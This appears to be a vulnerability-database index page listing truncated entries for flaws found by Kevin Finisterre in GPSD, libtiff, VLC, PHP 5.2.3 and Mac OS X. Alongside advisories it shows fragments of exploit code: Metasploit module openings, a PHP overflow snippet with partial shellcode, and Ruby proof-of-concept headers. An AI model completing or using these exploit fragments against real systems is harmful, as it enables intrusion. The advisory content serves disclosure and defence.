Berlios GPSD Format String Vulnerability

No description provided by source. $Id: gpsdformatstring.rb 9179 2010-04-30 08:40:19Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of...

Berlios GPSD 1.91-1 - 2.7-2 - Format String Vulnerability

No description provided by source. require 'msf/core' class Metasploit3 Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initializeinfo = superupdateinfoinfo, 'Name' = 'Berlios GPSD Format String Vulnerability', 'Description' = %q This module exploits a format string vulnerability in th...

RedHat Update for libtiff RHSA-2010:0520-01

Check for the Version of libtiff OpenVAS Vulnerability Test RedHat Update for libtiff RHSA-2010:0520-01 Authors: System Generated Check Copyright: Copyright c 2010 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under the...

RedHat Update for libtiff RHSA-2010:0519-01

Check for the Version of libtiff OpenVAS Vulnerability Test RedHat Update for libtiff RHSA-2010:0519-01 Authors: System Generated Check Copyright: Copyright c 2010 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under the...

Ubuntu Update for tiff vulnerabilities USN-954-1

Ubuntu Update for Linux kernel vulnerabilities USN-954-1 OpenVAS Vulnerability Test $Id: gbubuntuUSN9541.nasl 7965 2017-12-01 07:38:25Z santu $ Ubuntu Update for tiff vulnerabilities USN-954-1 Authors: System Generated Check Copyright: Copyright c 2010 Greenbone Networks GmbH,...

Ubuntu 6.06 LTS / 8.04 LTS / 9.04 / 9.10 / 10.04 LTS : tiff vulnerabilities (USN-954-1)

Kevin Finisterre discovered that the TIFF library did not correctly handle certain image structures. If a user or automated system were tricked into opening a specially crafted TIFF image, a remote attacker could execute arbitrary code with user privileges, or crash the application, leading to a...

Berlios GPSD - Format String (Metasploit)

$Id: gpsdformatstring.rb 9179 2010-04-30 08:40:19Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...

tiff -- buffer overflow vulnerability

Kevin Finisterre reports: Multiple integer overflows in the handling of TIFF files may result in a heap buffer overflow. Opening a maliciously crafted TIFF file may lead to an unexpected application termination or arbitrary code execution. The issues are addressed through improved bounds checking...

Berlios GPSD Format String Vulnerability

This module exploits a format string vulnerability in the Berlios GPSD server. This vulnerability was discovered by Kevin Finisterre. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Berlios GPS...

Apple QuickTime 7.27.3 (OSXWindows) - RSTP Response Universal

Apple QuickTime 7.27.3 OSXWindows - RSTP Response Universal Copyright C 2007 Subreption LLC. All rights reserved. Visit http://blog.subreption.com for exploit development notes. References: http://www.milw0rm.com/exploits/4648 original Microsoft Windows code http://www.milw0rm.com/exploits/4651...

php523browse-overflow.txt

7ffdf020 7c911005 7c9110ed 00000001 00000000 shoutz go to Kevin Finisterre / if!functionexists'winbrowsefile' die'win32std extension is not available'; $shellcode= "\x2b\xc9\xb1\x51\xba\xbb\xb2\xd5\x31\xda\xda\xd9\x74\x24\xf4". "\x58\x31\x50\x0e\x83\xc0\x04\x03\xeb\xb8\x37\xc4\xf7\xd7\x5c"...

PHP 5.2.3 - PHP_win32sti Local Buffer Overflow (1)

PHP 5.2.3 - PHPwin32sti Local Buffer Overflow 1 7ffdf020 7c911005 7c9110ed 00000001 00000000 shoutz go to Kevin Finisterre / if!functionexists'winbrowsefile' die'win32std extension is not available'; $shellcode= "\x2b\xc9\xb1\x51\xba\xbb\xb2\xd5\x31\xda\xda\xd9\x74\x24\xf4"...

PHP 5.2.3 - 'PHP_win32sti' Local Buffer Overflow (1)

7ffdf020 7c911005 7c9110ed 00000001 00000000 shoutz go to Kevin Finisterre / if!functionexists'winbrowsefile' die'win32std extension is not available'; $shellcode= "\x2b\xc9\xb1\x51\xba\xbb\xb2\xd5\x31\xda\xda\xd9\x74\x24\xf4". "\x58\x31\x50\x0e\x83\xc0\x04\x03\xeb\xb8\x37\xc4\xf7\xd7\x5c"...

Apple Mac OSX < 2007-005 - 'vpnd' Local Privilege Escalation

Copyright c 2007 Kevin Finisterre CVE-ID: CVE-2007-0753 - http://docs.info.apple.com/article.html?artnum=305530 https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4013.tar.gz 05302007-vpenis.tar.gz milw0rm.com 2007-05-30...

GLSA-200701-24 : VLC media player: Format string vulnerability

The remote host is affected by the vulnerability described in GLSA-200701-24 VLC media player: Format string vulnerability Kevin Finisterre has discovered that when handling media locations, various functions throughout VLC media player make improper use of format strings. Impact : An attacker...

DSA-1252-1 vlc

Bulletin has no description...

VLC media player: Format string vulnerability

Background VLC media player is a multimedia player for various audio and video formats. Description Kevin Finisterre has discovered that when handling media locations, various functions throughout VLC media player make improper use of format strings. Impact An attacker could entice a user to open...

Apple Mac OSX 10.4.8 - 'UserNotificationCenter' Local Privilege Escalation

!/usr/bin/ruby Copyright c 2007 Kevin Finisterre Lance M. Havok All pwnage reserved. "Exploit" for MOAB-22-01-2007: All your crash are belong to us. require 'fileutils' bugselected = ARGV0 || 0.toi INPUTMANAGERURL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007im.tar.gz" keeping a...

Apple Mac OSX 10.4.8 - SLP Daemon Service Registration Buffer Overflow (PoC)

!/usr/bin/ruby c Copyright 2006 Lance M. Havok Kevin Finisterre All pwnage reserved. Proof of concept for MOAB-17-01-2007 http://projects.info-pull.com/moab/MOAB-17-01-2007.html Originally reported to Apple by Kevin, on 08/02/2006. require 'socket' targetpath = ARGV0 || '/var/run/slpipc' slpsocke...

berlios.meta.txt

package Msf::Exploit::gpsdformatstring; use base "Msf::Exploit"; use strict; use Pex::Text; use IO::Socket; my $advanced = ; my $info = 'Name' = 'Berlios GPSD Format String Vulnerability', 'Version' = '$ 1.0 $', 'Authors' = 'Enseirb ', , 'Arch' = 'x86' , 'OS' = 'linux' , 'Priv' = 1, 'UserOpts' =...